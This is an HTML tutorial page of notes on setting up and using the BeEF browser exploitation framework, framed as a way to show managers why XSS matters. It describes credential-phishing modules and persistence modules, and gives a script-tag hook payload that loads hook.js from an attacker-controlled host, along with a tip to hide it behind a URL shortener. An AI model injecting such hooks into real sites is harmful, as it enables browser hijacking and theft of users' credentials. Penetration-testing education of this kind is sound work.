<!doctype html>
<html class="no-js">
	<head>
		<meta charset="utf-8">
		<title>BeEF Notes</title>
		<meta name="description" content="">
		<meta name="viewport" content="width=device-width">
		<link rel="shortcut icon" href="../favicon.ico">
		<!-- build:css styles/vendor.css -->
		<!-- bower:css -->
		<!-- endbower -->
		<!-- endbuild -->
		<!-- build:css(.tmp) styles/main.css -->
		<link rel="stylesheet" href="../styles/main.css">
		<!-- endbuild -->
		<!-- build:js scripts/vendor/modernizr.js -->
		<script src="../bower_components/modernizr/modernizr.js"></script>
		<!-- endbuild -->
	</head>
	<body class="beef-body">
		<!-- Loading the header with javascript include.  Should add a switch for html5 import -->
		<div class="navPlaceholder"></div>
		<!--[if lt IE 10]>
		<p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
		<![endif]-->
		<div class="container-fluid">
			<div>
				<div class="jumbotron">
					<h1>BeEF</h1>
					<p>&quot;i say we take off and nuke the entire site from orbit.&quot; - Ripley</p>
				</div>
			</div>
			<article>
			<div class="main">
			<h3>Introduction</h3>
			<p>BeEF is short for The Browser Exploitation Framework. For our purpose BeEF is a good tool to prove the value of fixing XSS vulnerabilities, yes we could show the PM look I can make the page alert(1), but they'll understand the risk if you can instead change the page to a Google Login window. It is a penetration testing tool that focuses on the web browser. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.</p>
			<h3>Installation</h3>
			<ol>
				<li>Install Ruby 1.9, homebrew &#x26; xCode if not already installed</li>
				<li>Install Bundler, in terminal:<div class="example2">sudo gem install bundler</div></li>
				<li>CD into whatever folder you keep tools and clone BeEF<div class="example2">git clone https://github.com/beefproject/beef.git</div></li>
				<li>CD into BeEF folder</li>
				<div class="example2">cd beef/</div>
				<li>Run the BeEF install command<div class="example2">bundle install</div></li>
				<li>The install mentions it but be sure to add ImageMagick if it is not already installed<div class="example2">brew update &#x26;&#x26; brew upgrade &#x26;&#x26; brew install imagemagick</div></li>
				
			</ol>
			<h3>Instructions</h3>
			<p>BeEF&#x27;s actually very simple you start it by cd&#x27;ing into the beef folder and turn it on with 1 command</p>
			<ul>
				<li>cd beef/</li>
				<li>./beef -x</li>
			</ul>
			<p>Now it will print out a bunch of data, there's various ways you can use beef, we'll be focusing on the GUI but if you were running on the command line you might want to pay attention to other data like the API Key. But for the GUI, you're looking for the Hook URL and the UI URL, it prints out four of these, from what I can tell the one you can from the network access always prints out second (The IP address should match your computers IP address in OSX > Preferences > Network settings). From here in for example Chrome, go to the UI URL</p>
			<ul>
				<li>http://##.##.##.##:####/ui/panel</li>
				<li>Username:beef, Password:beef</li>
			</ul>
			<p>This drops you into the getting started tab, in the description you can find the 2 demo sites ( http://##.##.##.##:####/demos/butcher/index.html &#x26; http://##.##.##.##:####/demos/basic.html) and the an explanation of the color coding for each command. So to test lets go to one of the demo sites in firefox, it already has the hook script in it. This should make a Firefox browser appear in BeEF UI, Online browsers menu on the left of the UI.</p>
			<img src="../images/BeEF/BeEF1.png"  alt="Image showing click on left section." title="Click Browser" />
			<p>Enter the details view by clicking on the IP address of the hooked browser. This should open the Current Browser tab, it starts on the details sub tab that lists a bunch of information it automatically pulls back from the browser.</p>
			<img src="../images/BeEF/BeEF2.png"  alt="Image of the details Screen." title="Details Screen" />
			<p>Now check out the Commands sub-tab, here are all the exploits you can run against a hooked browser. I find Petty Theft and Google Phishing are probably the easiest way to demo how bad XSS is. </p>
			<img src="../images/BeEF/BeEF3.png"  alt="Buttons to execute a command" title="Command buttons" />
			<p>Select a command from the Module Tree and hit the Execute button in the bottom right of the module column. For simpler commands like Debug &gt; Return ascii characters, you simply hit select the command number in Module Results History and the information should come back 1-10 seconds later depending on connection speed. For Social Engineering commands you will not get a result until they submit the form (which would deliver back email and password, you probably shouldn&#x27;t let them fill it out with legitimate info) and you get nothing back if they cancel out. There&#x27;s other fun commands like playing sounds on Mobile Device or you can make your own custom sound to play on a computer, you can even Rick Roll people.</p>
			<img src="../images/BeEF/BeEF4.png"  alt="See what comes back in results" title="Results Screen" />
			<p>So that's the basics, now if you have a reflected or stored vulnerability,  you just drop in your BeEF hook (Hook URL mentioned in printed out when you launched)  in as a script. I suggest just using tinyURL to obfuscate it if the vulnerability is in the URL. Just use the hook URL:</p>
			<div class="example2">
				&#x3C;script type=&#x22;text/javascript&#x22; src=&#x22;http://##.##.##.##:####/hook.js&#x22;&gt;&#x3C;/script&gt;
			</div>
			<p>There's ways you can hook the browser itself if they install extensions, for now the easiest way to keep somebody hooked in is to use the <a href="https://github.com/beefproject/beef/wiki/Persistence" target="_blank">Persistence</a> Modules in the Module Tree.  There's also a way you can setup a <a href="https://github.com/SpiderLabs/beef_injection_framework" target="_blank">listener</a> to automatically launch attacks when people get hooked by BeEF.</p>
		</article>
			<!-- Loading footer with AJAX -->
			<div class="footerPlaceholder"></div>
		</div>
		<!-- build:js scripts/vendor.js -->
		<!-- bower:js -->
		<script src="../bower_components/jquery/dist/jquery.js"></script>
		<!-- endbower -->
		<!-- endbuild -->
		<!-- Google Analytics: change UA-XXXXX-X to be your site's ID. -->
		<script>
			(function(b,o,i,l,e,r){b.GoogleAnalyticsObject=l;b[l]||(b[l]=
			function(){(b[l].q=b[l].q||[]).push(arguments)});b[l].l=+new Date;
			e=o.createElement(i);r=o.getElementsByTagName(i)[0];
			e.src='//www.google-analytics.com/analytics.js';
			r.parentNode.insertBefore(e,r)}(window,document,'script','ga'));
			ga('create','UA-XXXXX-X');ga('send','pageview');
		</script>
		<!-- build:js scripts/plugins.js -->
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/affix.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/alert.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/dropdown.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/tooltip.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/modal.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/transition.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/button.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/popover.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/carousel.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/scrollspy.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/collapse.js"></script>
		<script src="../bower_components/bootstrap-sass-official/vendor/assets/javascripts/bootstrap/tab.js"></script>
		<!-- endbuild -->
		<!-- build:js({app,.tmp}) scripts/main.js -->
		<script src="../scripts/main.js"></script>
		<!-- endbuild -->
		<!-- myScripts -->
		<script src="../includes/nav.js"></script>
		<script src="../includes/footer.js"></script>
	</body>
</html>